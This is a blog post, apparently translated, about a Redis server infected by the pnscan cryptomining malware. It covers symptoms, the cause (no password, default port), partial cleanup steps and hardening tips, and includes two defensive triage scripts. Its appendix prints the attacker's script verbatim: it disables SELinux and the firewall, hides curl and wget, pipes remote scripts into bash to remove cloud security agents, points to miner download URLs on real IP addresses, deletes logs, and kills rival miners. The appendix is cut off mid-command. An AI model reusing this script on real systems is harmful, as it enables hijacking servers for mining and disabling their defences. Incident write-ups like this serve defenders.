A painful lesson: how I was attacked by the pnscan virus
Published: 2019-05-10


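0. The incident

Symptoms of the pnscan infection:

  • Commands such as top, ps and netstat no longer worked properly
  • CPU was at roughly 100%, and the network dropped from time to time
  • The Redis port 6379 was occupied by a large number of threads
  • Checking the process with lsof -i:6379 showed the process ID changing constantly
  • rm -rf on the attack scripts reported no permission (adding sudo did not help either; this virus completely won my respect!)

>>Note<<

  • In the end, because far too many files were infected, I could only reinstall the system. Although I deleted the core attack script, many of my own scripts and commands had been damaged as well.
  • If the investigation process is useful to you, please read on; if you want a complete fix, you can close this page now (I did not find a complete solution either!)

1. Cause

  • At first Redis was set to a non-default port and had a password, and everything seemed calm.
  • Later I removed the password and changed the port back to the default 6379. And the result, the result was…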

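2. Investigation

After a quick look I found I could not do anything. I first found the following article through Baidu:

1. Pain point 1: multiple attack scripts take over the CPU completely

In the etc directory I found several suspicious files, mainly these three:

newinit.sh
newsvc.sh
newdat.sh

These scripts cannot be removed with a plain rm, because the files all carry the i attribute; use lsattr <file name> to view a file's attributes.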

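lsattr newinit.sh
# ----ia----------- newinit.sh
# Once you know the cause it is easy: use chattr to clear the attribute, as follows.
# The lsattr output above shows both i and a set, and either one blocks rm, so clear both.
chattr -ia newinit.sh
rm -rf newinit.sh

  • With the commands above you can delete the main attack script directly. At that point CPU usage returned to normal.
  • However, what you deleted is only one of them; a lot more is hidden. Search the core attack script for chattr -ia and you will see that it modifies many files.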

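2. Pain point 2: top, ps, crontab and other command files were tampered with

What happens when running top

[image]
The content of the top command's file had been replaced with the following
[image]

Because many files were tampered with, all in much the same way, the original commands could not be used, and restoring them would be a lot of work!

Below is a partial screenshot of the tampered files:

[image]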

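3. Pain point 3: the crontab scheduled-task files were infected

Although the newinit.sh script had been deleted, the scheduled task could not be removed with crontab -e.

[image]

Later I found crontab's source files; after deleting 5 files, a new source file popped up again, so the scheduled task simply could not be deleted. Who knows when this tumor will come back!

[image]

I roughly located the script logic behind this; I am not familiar with shell, so those who are can study it in detail

[image]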
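A read-only triage of pain points 2 and 3, as an added example that is not part of the original post: it looks for the ps/top/pstree wrappers and the newinit.sh cron entries that the appendix script installs. The function names are hypothetical and the sample tree is constructed; the indicators (the ".original" suffix, newinit.sh) come from the appendix script.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.
# ROOT is the filesystem to inspect: "/" on a live host, or the mount point of
# the suspect disk when booted from rescue media (the host's own ps/top lie).

# List ps/top/pstree under ROOT that look like the wrappers the appendix script
# installs: a "<tool>.original" sibling exists, or the tool is a "#!" script.
find_wrapped_tools() {
    root=${1%/}
    for dir in bin usr/bin; do
        # Skip /bin when it is only a symlink to /usr/bin (merged-usr layouts).
        if [ -L "$root/$dir" ]; then continue; fi
        for tool in ps top pstree; do
            f="$root/$dir/$tool"
            [ -f "$f" ] || continue
            reason=""
            if [ -e "$f.original" ]; then reason="original-moved-aside"; fi
            if [ "$(head -c 2 "$f" 2>/dev/null)" = "#!" ]; then
                reason="${reason:+$reason,}is-script"
            fi
            if [ -n "$reason" ]; then echo "/$dir/$tool $reason"; fi
        done
    done
    return 0
}

# List cron files under ROOT whose content matches a persistence marker.
# The default marker is the script name used in the appendix (newinit.sh).
find_cron_persistence() {
    root=${1%/}
    pattern=${2:-'newinit\.sh'}
    for p in etc/crontab etc/cron.d var/spool/cron; do
        [ -e "$root/$p" ] || continue
        grep -rlE "$pattern" "$root/$p" 2>/dev/null | sed "s|^$root||"
    done
    return 0
}

# Print all findings; return 1 if there are any, 0 if the tree looks clean.
triage() {
    findings=$(find_wrapped_tools "$1"; find_cron_persistence "$1")
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Build a small CONSTRUCTED tree that mimics the tampering (not a real host).
build_sample_root() {
    t=$(mktemp -d)
    mkdir -p "$t/bin" "$t/etc/cron.d" "$t/var/spool/cron"
    printf '\177ELF' > "$t/bin/ps.original"      # real binary, moved aside
    printf '#! /bin/bash\nps.original $@ | grep -v "zzh\\|pnscan"\n' > "$t/bin/ps"
    printf '\177ELF' > "$t/bin/top"              # untouched tool
    echo '*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1' > "$t/var/spool/cron/root"
    echo '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$t/etc/crontab"
    echo "$t"
}

# Demo on the constructed tree.
sample=$(build_sample_root)
triage "$sample" || echo "-> tampering indicators present"
rm -rf "$sample"
```

On a real host the cron files may also carry the i and a attributes, so check them with lsattr before trying to clean anything up.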

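3. Summary:

  • To completely remove this tumor there is a lot to restore, and you need to fully understand the attack script; otherwise you cannot fully recover
  • Considering that my abilities are still limited, with that much time it is better to reinstall the system.
  • This server is for personal study and I paid little attention to security. At the very least, from now on I will set a password whenever I enable any service!!
  • If possible, configure the firewall to allow access only from fixed IP addresses; common ports such as 80/3306/6379 can be changed to non-default ports.
  • When I have time I will roughly study the script in the appendix; it shows how far I am from the experts. If you don't learn you just get beaten! Motivation to study instantly up, up, up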
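A check for the configuration mistake behind this incident (no password, default port), as an added example that is not part of the original post. It reads a redis.conf and reports weak settings; requirepass, port, bind and protected-mode are real Redis directives, while the function names and both sample configs are constructed, and the bind and protected-mode checks go beyond what the post mentions.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# Print the value of a redis.conf directive, taking the last occurrence and
# ignoring comments and blank lines; print nothing if it is never set.
redis_directive() {
    awk -v key="$2" '
        /^[ \t]*(#|$)/ { next }
        tolower($1) == key {
            $1 = ""; sub(/^[ \t]+/, "")
            val = $0; gsub(/"/, "", val); found = 1
        }
        END { if (found) print val }' "$1"
}

# Succeed only if every address in a bind value is a loopback address.
# An empty value means no bind line, which is treated as all interfaces.
is_loopback_only() {
    [ -n "$1" ] || return 1
    case $1 in *\**) return 1 ;; esac      # "bind *" listens everywhere
    for a in $1; do
        case "${a#-}" in                   # a leading "-" marks an optional address
            127.*|::1) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Print a space-separated list of findings; an empty line means none.
audit_redis_conf() {
    conf=$1
    pass=$(redis_directive "$conf" requirepass)
    port=$(redis_directive "$conf" port)
    bind=$(redis_directive "$conf" bind)
    pmode=$(redis_directive "$conf" protected-mode)
    out=""
    if [ -z "$pass" ]; then out="$out NO_PASSWORD"; fi
    if [ "${port:-6379}" = "6379" ]; then out="$out DEFAULT_PORT"; fi
    if ! is_loopback_only "$bind"; then out="$out NON_LOOPBACK_BIND"; fi
    if [ "$pmode" = "no" ]; then out="$out PROTECTED_MODE_OFF"; fi
    echo "${out# }"
}

# Write two CONSTRUCTED sample configs into directory $1.
write_samples() {
    cat > "$1/weak.conf" <<'EOF'
# constructed sample: the state described under "Cause"
port 6379
# requirepass old-secret
protected-mode no
EOF
    cat > "$1/hardened.conf" <<'EOF'
# constructed sample: password set, non-default port, loopback only
bind 127.0.0.1 -::1
port 16379
requirepass "example-long-random-secret"
protected-mode yes
EOF
}

# Demo on the constructed samples.
demo_dir=$(mktemp -d)
write_samples "$demo_dir"
echo "weak.conf:     $(audit_redis_conf "$demo_dir/weak.conf")"
echo "hardened.conf: $(audit_redis_conf "$demo_dir/hardened.conf")"
rm -rf "$demo_dir"
```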


4. Appendix: the core attack script

#!/bin/shsetenforce 0 2>dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullsync && echo 3 >/proc/sys/vm/drop_cachescrondir='/var/spool/cron/'"$USER"cont=`cat ${
crondir}`ssht=`cat /root/.ssh/authorized_keys`echo 1 > /etc/zzhsrtdir="/etc/zzhs"bbdir="/usr/bin/curl"bbdira="/usr/bin/cd1"ccdir="/usr/bin/wget"ccdira="/usr/bin/wd1"mv /usr/bin/curl /usr/bin/urlmv /usr/bin/url /usr/bin/cd1mv /usr/bin/wget /usr/bin/getmv /usr/bin/get /usr/bin/wd1ulimit -n 65535rm -rf /var/log/syslogchattr -iua /tmp/chattr -iua /var/tmp/ufw disableiptables -F#sudo sysctl kernel.nmi_watchdog=0echo '0' >/proc/sys/kernel/nmi_watchdogecho 'kernel.nmi_watchdog=0' >>/etc/sysctl.confuserdel akayuserdel vfinderrm -rf /tmp/addres*rm -rf /tmp/walle*rm -rf /tmp/keysif ps aux | grep -i '[a]liyun'; then $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -yelif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.shfiminer_url="http://199.19.226.117/b2f628/zzh"miner_url_backup="http://106.15.74.113/b2f628/zzh"miner_size="7600464"sh_url="http://199.19.226.117/b2f628/newinit.sh"sh_url_backup="http://106.15.74.113/b2f628/newinit.sh"config_url="http://199.19.226.117/b2f628/config.json"config_url_backup="http://106.15.74.113/b2f628/config.json"config_size="2732"chattr_size="8000"rm -f /tmp/.null 2>/dev/nullecho 128 > /proc/sys/vm/nr_hugepagessysctl -w vm.nr_hugepages=128kill_miner_proc(){
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kworker -c\' | awk '{
print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps 
aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "]" 
| awk '$3>10.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %#ps aux | grep -v grep | grep -v root | grep -v dblaunch | 
grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi | awk '$3>80.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | 
awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep 
"mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %pgrep -f xzpauectgr | xargs -I % kill -9 %pgrep -f slxfbkmxtd | xargs -I % kill -9 %pgrep -f mixtape | xargs -I % kill -9 %pgrep -f addnj | xargs -I % kill -9 %pgrep -f 200.68.17.196 | xargs -I % kill -9 %pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %pgrep -f 
Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %pgrep -f honvbsasbf.conf | xargs -I % kill -9 %pgrep -f mqdsflm.cf | xargs -I % kill -9 %pgrep -f lower.sh | xargs -I % kill -9 %pgrep -f ./ppp | xargs -I % kill -9 %pgrep -f cryptonight | xargs -I % kill -9 %pgrep -f ./seervceaess | xargs -I % kill -9 %pgrep -f ./servceaess | xargs -I % kill -9 %pgrep -f ./servceas | xargs -I % kill -9 %pgrep -f ./servcesa | xargs -I % kill -9 %pgrep -f ./vsp | xargs -I % kill -9 %pgrep -f ./jvs | xargs -I % kill -9 %pgrep -f ./pvv | xargs -I % kill -9 %pgrep -f ./vpp | xargs -I % kill -9 %pgrep -f ./pces | xargs -I % kill -9 %pgrep -f ./rspce | xargs -I % kill -9 %pgrep -f ./haveged | xargs -I % kill -9 %pgrep -f ./jiba | xargs -I % kill -9 %pgrep -f ./watchbog | xargs -I % kill -9 %pgrep -f ./A7mA5gb | xargs -I % kill -9 %pgrep -f kacpi_svc | xargs -I % kill -9 %pgrep -f kswap_svc | xargs -I % kill -9 %pgrep -f kauditd_svc | xargs -I % kill -9 %pgrep -f kpsmoused_svc | xargs -I % kill -9 %pgrep -f kseriod_svc | xargs -I % kill -9 %pgrep -f kthreadd_svc | xargs -I % kill -9 %pgrep -f ksoftirqd_svc | xargs -I % kill -9 %pgrep -f kintegrityd_svc | xargs -I % kill -9 %pgrep -f jawa | xargs -I % kill -9 %pgrep -f oracle.jpg | xargs -I % kill -9 %pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %pgrep -f 188.209.49.54 | xargs -I % kill -9 %pgrep -f 181.214.87.241 | xargs -I % kill -9 %pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %pgrep -f servim | xargs -I % kill -9 %pgrep -f kblockd_svc | xargs -I % kill -9 %pgrep -f native_svc | xargs -I % kill -9 %pgrep -f ynn | xargs -I % kill -9 %pgrep -f 65ccEJ7 | xargs -I % kill -9 %pgrep -f jmxx | xargs -I % kill -9 %pgrep -f 2Ne80nA | xargs -I % kill -9 %pgrep -f sysstats | xargs -I % kill -9 %pgrep 
-f systemxlv | xargs -I % kill -9 %pgrep -f watchbog | xargs -I % kill -9 %pgrep -f OIcJi1m | xargs -I % kill -9 %pkill -f biosetjenkinspkill -f Loopbackpkill -f apacehapkill -f cryptonightpkill -f mixnerdxpkill -f performedlpkill -f JnKihGjnpkill -f irqba2anc1pkill -f irqba5xnc1pkill -f irqbnc1pkill -f ir29xc1pkill -f connspkill -f irqbalancepkill -f crypto-poolpkill -f XJnRjpkill -f mgwslpkill -f pythnopkill -f jweripkill -f lx26pkill -f NXLAipkill -f BI5zjpkill -f askdljlqwpkill -f minerdpkill -f minergatepkill -f Guard.shpkill -f ysaydhpkill -f bonnspkill -f donnspkill -f kxjdpkill -f Duck.shpkill -f bonn.shpkill -f conn.shpkill -f kworker34pkill -f kw.shpkill -f pro.shpkill -f polkitdpkill -f acpidpkill -f icb5opkill -f nopxipkill -f irqbalanc1pkill -f minerdpkill -f i586pkill -f gddrpkill -f mstxmrpkill -f ddg.2011pkill -f wnTKYgpkill -f deamonpkill -f disk_geniuspkill -f sourplumpkill -f polkitdpkill -f nanoWatchpkill -f zigwpkill -f devtoolpkill -f devtoolspkill -f systemctIpkill -f watchbogpkill -f cryptonightpkill -f sustespkill -f xmrigpkill -f xmrig-cpupkill -f 121.42.151.137pkill -f init12.cfgpkill -f nginxkpkill -f tmp/wc.confpkill -f xmrig-notlspkill -f xmr-stakpkill -f suppoiepkill -f zer0day.rupkill -f dbus-daemon--systempkill -f nullcrewpkill -f systemctIpkill -f kworkerdspkill -f init10.cfgpkill -f /wl.confpkill -f crond64pkill -f sustsepkill -f vmlinuzpkill -f exinpkill -f apachiiipkill -f svcworkmanagerpkill -f xrpkill -f tracepkill -f svcupdatepkill -f networkmanagerpkill -f phpupdaterm -rf /usr/bin/config.jsonrm -rf /usr/bin/exinrm -rf /tmp/wc.confrm -rf /tmp/log_rotrm -rf /tmp/apachiiirm -rf /tmp/sustserm -rf /tmp/phprm -rf 